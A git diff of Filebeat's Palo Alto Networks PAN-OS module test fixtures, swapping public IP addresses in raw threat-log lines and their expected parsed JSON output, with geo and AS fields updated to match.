07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
07:14:39,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,216.160.83.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
08:08:08,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,67.43.156.14,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:07:49,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:53:41,192.168.0.2,89.160.20.156,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 
03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 
03:45:45,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 
04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json index 3d3f6013ebd1..58ba2c93b7ce 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json @@ -4,19 +4,15 @@ "client.ip": "192.168.0.2", "client.port": 59309, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -27,7 +23,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -41,7 +37,7 @@ "log.level": "informational", "log.offset": 0, "network.application": "web-browsing", - "network.community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=", + "network.community_id": "1:tf34cPo413Ta9avfHZIP6b5DHXc=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -76,13 +72,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -105,19 +101,15 @@ "client.ip": "192.168.0.2", "client.port": 59313, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -128,7 +120,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -140,9 +132,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 403, + "log.offset": 401, "network.application": "web-browsing", - "network.community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=", + "network.community_id": "1:q5WSywQz9mnveJuMrWqG0rlBf3g=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -177,13 +169,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -207,19 +199,15 @@ "client.ip": "192.168.0.2", "client.port": 59314, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -230,7 +218,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -242,9 +230,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 813, + "log.offset": 809, "network.application": "web-browsing", - "network.community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=", + "network.community_id": "1:6ykXrYnnXhC2OTYegSkf7HauF6Y=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -279,13 +267,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
